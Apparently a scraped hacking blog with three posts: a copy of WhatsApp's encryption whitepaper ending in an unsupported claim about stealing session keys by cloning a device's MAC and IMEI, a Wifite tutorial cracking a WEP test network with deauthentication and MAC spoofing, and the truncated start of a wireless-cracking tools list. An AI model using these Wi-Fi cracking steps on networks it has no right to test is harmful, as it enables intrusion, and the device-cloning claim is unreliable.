font-variant: normal;">“ratchets” forward with every message sent. Additionally, a new ECDH<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">agreement is performed with each message roundtrip to create a new<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> . This provides forward secrecy through the combination<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">of both an immediate “hash ratchet” and a round trip “DH ratchet.”<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Calculating a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Message Key <span style="color: #39bca8; font-style: normal; font-variant: normal;">from a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Chain Key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Each time a new <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is needed by a<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">message sender, it is calculated as:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key = HMAC-SHA256(Chain Key, 0x01)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is then updated as <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key =<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256(Chain Key, 0x02)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This causes the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">to “ratchet” forward, and<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">also means that a stored <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">can’t be used to<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">derive current or past values of the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Calculating a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Chain Key <span style="color: #39bca8; font-style: normal; font-variant: normal;">from a <span style="color: #39bca8; font-style: normal; font-variant: normal;">Root Key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Each time a message is transmitted, an ephemeral <span style="color: #59595c; font-style: normal; font-variant: normal;">Curve25519<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">public key is advertised along with it. Once a response is received,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">a new <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">are calculated as:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . <span style="color: #59595c; font-style: normal; font-variant: normal;">ephemeral_secret =<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ECDH(Ephemeral<span style="color: #939597; font-style: normal; font-variant: normal;">sender<span style="color: #59595c; font-style: normal; font-variant: normal;">, Ephemeral<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"> <span style="color: #59595c; font-style: normal; font-variant: normal;">2 . <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key, Root Key =<span style="color: #59595c; font-style: normal; font-variant: normal;"> HKDF(Root Key, ephemeral_secret)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">A chain is only ever used to send messages from one user, so<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">message keys are not reused. Because of the way <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Keys<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">are calculated, messages can arrive delayed,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">out of order, or can be lost entirely without any problems .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Transmitting Media and Other<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Attachments<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">large attachments of any type (video, audio, images,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">or files) are also end-to-end encrypted:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The WhatsApp user sending a message (“sender”) generates an<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ephemeral 32 byte <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">key, and an ephemeral 32 byte <span style="color: #59595c; font-style: normal; font-variant: normal;">HMACSHA256 <span style="color: #59595c; font-style: normal; font-variant: normal;">key.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The sender encrypts the attachment with the <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">key in CBC<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">mode with a random IV, then appends a MAC of the ciphertext using<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256 .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The sender uploads the encrypted attachment to a blob store .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . The sender transmits a normal encrypted message to the recipient<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">that contains the encryption key, the HMAC key, a SHA256 hash of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the encrypted blob, and a pointer to the blob in the blob store .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">5 . The recipient decrypts the message, retrieves the encrypted blob<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">from the blob store, verifies the SHA256 hash of it, verifies the MAC,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">and decrypts the plaintext .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Group Messages<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Traditional unencrypted messenger apps typically employ “server-side<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">fan-out” for group messages . A client wishing to send a message<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">to a group of users transmits a single message, which is then distributed N times to the N different group members by the server .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This is in contrast to “client-side fan-out,” where a client would transmit<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">a single message N times to the N different group members itself .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Messages to WhatsApp groups build on the pairwise encrypted<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">sessions outlined above to achieve efficient server-side fan-out for<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">most messages sent to groups . This is accomplished using the<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">“Sender Keys” component of the Signal Messaging protocol .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">The first time a WhatsApp group member sends a message to a group:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The sender generates a random 32-byte <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The sender generates a random Curve25519 <span style="color: #59595c; font-style: normal; font-variant: normal;">Signature Key <span style="color: #59595c; font-style: normal; font-variant: normal;">key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">pair .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The sender combines the 32-byte <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and the public key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">Signature Key <span style="color: #59595c; font-style: normal; font-variant: normal;">into a <span style="color: #59595c; font-style: normal; font-variant: normal;">Sender Key <span style="color: #59595c; font-style: normal; font-variant: normal;">message .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . The sender individually encrypts the <span style="color: #59595c; font-style: normal; font-variant: normal;">Sender Key <span style="color: #59595c; font-style: normal; font-variant: normal;">to each member<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">of the group, using the pairwise messaging protocol explained previously .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">For all subsequent messages to the group:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The sender derives a <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, and<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">updates the <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The sender encrypts the message using <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">in CBC mode .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The sender signs the ciphertext using the <span style="color: #59595c; font-style: normal; font-variant: normal;">Signature Key<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . The sender transmits the single ciphertext message to the server,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">which does server-side fan-out to all group participants .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The “hash ratchet” of the message sender’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">provides<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">forward secrecy . Whenever a group member leaves, all group<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">participants clear their <span style="color: #59595c; font-style: normal; font-variant: normal;">Sender Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and start over .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Call Setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp calls are also end-to-end encrypted .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">When a WhatsApp user initiates a call:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The initiator builds an encrypted session with the recipient (as<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">outlined in Section <span style="color: #59595c; font-style: normal; font-variant: normal;"><i>Initiating Session Setup</i><span style="color: #59595c; font-style: normal; font-variant: normal;">), if one does not already<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">exist .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The initiator generates a random 32-byte SRTp master secret .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The initiator transmits an encrypted message to the recipient that<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">signals an incoming call, and contains the SRTp master secret .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . If the responder answers the call, a SRTp encrypted call ensues .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Verifying Keys<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp users additionally have the option to verify the keys of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the other users with whom they are communicating so that they<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">are able to confirm that an unauthorized third party (or WhatsApp)<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">has not initiated a man-in-the-middle attack. This can be done<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">by scanning a QR code, or by comparing a 60-digit number .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">The QR code contains:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . A version .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The user identifier for both parties.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The full 32-byte public <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">for both parties .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">When either user scans the other’s QR code, the keys are<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">compared to ensure that what is in the QR code matches<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as retrieved from the server .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The 60-digit number is computed by concatenating the two<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">30-digit numeric fingerprints for each user’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Key<span style="color: #59595c; font-style: normal; font-variant: normal;">. To calculate a 30-digit numeric fingerprint:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . Iteratively SHA-512 hash the public <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and user identifier 5200 times.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . Take the first 30 bytes of the final hash output.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . Split the 30-byte result into six 5-byte chunks.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . Convert each 5-byte chunk into 5 digits by interpreting each 5-byte<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">chunk as a big-endian unsigned integer and reducing it modulo<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">100000 .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">5 . Concatenate the six groups of five digits into thirty digits.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Transport Security<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">All communication between WhatsApp clients and WhatsApp servers<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">is layered within a separate encrypted channel . On Windows phone,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">iphone, and Android, those end-to-end encryption capable clients use<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Noise pipes with Curve25519, AES-GCM, and SHA256 from the Noise<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Protocol Framework for long running interactive connections.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This provides clients with a few nice properties:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . Extremely fast lightweight connection setup and resume .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . Encrypts metadata to hide it from unauthorized network observers.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">No information about the connecting user’s identity is revealed .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . No client authentication secrets are stored on the server . Clients<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">authenticate themselves using a Curve25519 key pair, so the server<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">only stores a client’s public authentication key. If the server’s user<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">database is ever compromised, no private authentication credentials<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">will be revealed .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #8d8a8c; font-style: normal; font-variant: normal;"></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #39bca8; font-style: normal; font-variant: normal;"><span style="color: #39bca8; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #39bca8; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"> </span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><span style="color: #39bca8; font-family: Roboto-Light; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Conclusion<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Messages between WhatsApp users are protected with an endto-end encryption protocol so that third parties and WhatsApp<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">cannot read them and so that the messages can only be decrypted<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">by the recipient . All types of WhatsApp messages (including<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">chats, group chats, images, videos, voice messages and files)<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">and WhatsApp calls are protected by end-to-end encryption .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp servers do not have access to the private keys of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp users, and WhatsApp users have the option to verify<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">keys in order to ensure the integrity of their communication.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The Signal protocol library used by WhatsApp is Open Source, available<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">here: https://github .com/whispersystems/libsignal-protocol-java/</span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<br />
<span style="color: #39bca8; font-family: Roboto-Light; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;"><span style="color: #59595c; font-style: normal; font-variant: normal;">So from where we can understand that WhatsApp , uses session key for each contact and it changes only when device is updated so if a hacker clones the device via Mac Address and IMEI code then It'll be a treasure box for him. wait for my next post :p </span></span></span></span></span></span></span></span></span></span></span></span></span><!--EndFragm--></div>
Unknownnoreply@blogger.com0Los Angeles, CA, USA34.0522342 -118.243684933.2099567 -119.5345784 34.8945117 -116.95279140000001tag:blogger.com,1999:blog-185877282583432766.post-38484574840656285872016-01-23T12:40:00.000+05:302016-01-23T12:40:15.132+05:30Wireless Hacking using WiFite part-1<div dir="ltr" style="text-align: left;" trbidi="on">
In this article series, we will look at a tool named Wifite suitable for
automated auditing of wireless networks. Most of you who have
experience in wireless pentesting would use tools like airmon-ng,
aireplay-ng, airodump-ng, aircrack-ng to crack wireless networks. This
would involve a sequence of steps, like capturing a specific numbers of
IV’s in case of WEP, capturing the WPA handshake in case of WPA etc, and
then subsequently using aircrack-ng to crack the password required for
authentication to the network. Wifite aims to ease this process by using
a wrapper over all these tools and thus making it super easy to crack
Wifi networks.<br />
Here is a list of features of Wifite as per its official <a href="https://code.google.com/p/wifite/"><span style="color: blue;">homepage</span></a>.<br />
<ul>
<li>sorts targets by signal strength (in dB); cracks closest access points first</li>
<li>automatically de-authenticates clients of hidden networks to reveal SSIDs</li>
<li>numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)</li>
<li>customizable settings (timeouts, packets/sec, etc)</li>
<li>“anonymous” feature; changes MAC to a random address before attacking, then changes back when attacks are complete</li>
<li>all captured WPA handshakes are backed up to wifite.py’s current directory</li>
<li>smart WPA de-authentication; cycles between all clients and broadcast deauths</li>
<li>stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit</li>
<li>displays session summary at exit; shows any cracked keys</li>
<li>all passwords saved to cracked.txt</li>
<li>built-in updater: ./wifite.py -upgrade</li>
</ul>
Before we start using wifite, make sure you have a proper wireless
card that supports packet injection. If you don’t have one, i would
suggest that you buy <a href="http://www.amazon.com/Alfa-AWUS036H-802-11b-Wireless-network/dp/B002WCEWU8"><span style="color: blue;">this</span></a> card.<br />
Note that there is a bug in Wifite that may or may not be there in
your particular version of Wifite. The bug basically doesn’t aireplay-ng
to function properly and displays an error like <em>aireplay-ng exited unexpectedly </em>.
In order to fix this, you will have to make slight modifications in the
code of wifite. You can install gedit (apt-get install gedit) which is a
text editor and then edit the wifite python script (found in
/usr/bin/wifite) using the steps mentioned <a href="https://code.google.com/p/wifite/issues/detail?id=127"><span style="color: blue;">here</span></a>. To open wifite, use the command <em>gedit /usr/bin/wifite</em>. This will open up the source code of wifite. Then replace every occurence of <em>cmd = [‘aireplay-ng’,</em> with <em>cmd = [‘aireplay-ng’,’–ignore-negative-one’,</em><br />
Wifite can be found under <em>Applications -> Kali Linux -> Wireless Attacks -> 802.11 Wireless Tools</em>.
Also, note that if you are running wifite in a different VM than Kali
Linux, then you have to make sure that tools like airmon-ng,
aireplay-ng, airodump-ng, aircrack-ng are already installed on that
system. This is because Wifite is nothing but a wrapper over all these
tools. Before we even start using Wifite, it is better to update to the
latest version.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt1.png" /><br />
In my case, i already have the latest version. In this tutorial, we
will be targeting a simple Wifi network with WEP encryption. Just using
the command <em>wifite -h</em> will give you a list of all the commands.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt2.png" /><br />
A very tempting option would be <em>-all</em> which tries to attack
every network that it finds. We will try it in later articles in this
series. However, first lets take a look at all the targets that we have.
To do that, use the command <em>wifite -showb</em><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt3.png" /><br />
Once this is done, we can see that wifite has put our network
interface card into monitor mode (using airmon-ng) and started to look
for clients. After a few more seconds, it will start displaying the list
of access points.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt4.png" /><br />
Note that as it is mentioned in its feature list (automatically
de-authenticates clients of hidden networks to reveal SSIDs), this list
will also include hidden access points. Hence, wifite can also be used
to find hidden access points. In this case we will attack an access
point with the BSSID 00:26:75:02:EF:65 that i have set up for testing
purposes. The access point has a simple WEP password <em>1234567890</em>.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt5.png" /><br />
To start attacking an access point, just press <em>Ctrl+C</em>.
Wifite will now ask you to choose a target number from the list. The
target number for my test network is 1, so let me enter that. Note that
if you press <em>Ctrl+C</em> again, it will quit Wifite.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt6.png" /><br />
You can now see that Wifite will start attempting to crack the WEP
access point using the different known techniques for cracking WEP
encryption. After some unsuccessful tries, it has finally begun to start
attacking the access points using different techniques for cracking
WEP.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt7.png" /><br />
Once enough IV’s are being captured, it will automatically start cracking the password.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt8.png" /><br />
As we can see, Wifite has successfully figured out the WEP key for
the access point. Wifite is an extremely useful tool for cracking
wireless networks. As i mentioned previously, you need to have all the
tools like airmon-ng, aireplay-ng, airodump-ng, aircrack-ng already
installed on your system. To further prove the point, let’s dive into
the source code of Wifite.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101714_1132_WifiteWalkt9.png" /><br />
As we can see, the python code has mentions of calling aireplay-ng. Hence, it is recommended to run Wifite inside Kali linux.<br />
<br />
In the next article, we will look at some advanced usage options of Wifite.</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-67207037935703689532016-01-23T12:34:00.001+05:302016-01-23T12:34:48.173+05:3020 Popular Wireless Hacking Tools (2016)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Last year, I wrote an article covering popular wireless hacking tools to crack or recover password of wireless network. We added 13 tools in that article which were popular and work great. Now I am updating that post to add few more in that list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I will not explain about wireless security and WPA/WEP. You can read the <span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">existing article on wireless hacking tools</span> to learn about them. In this post, I am updating the existing list to add few more powerful tools. I am adding seven new tools in the existing list to give you a single list of the most used wireless cracking tools.</div>
<div class="separator" style="clear: both; text-align: center;">
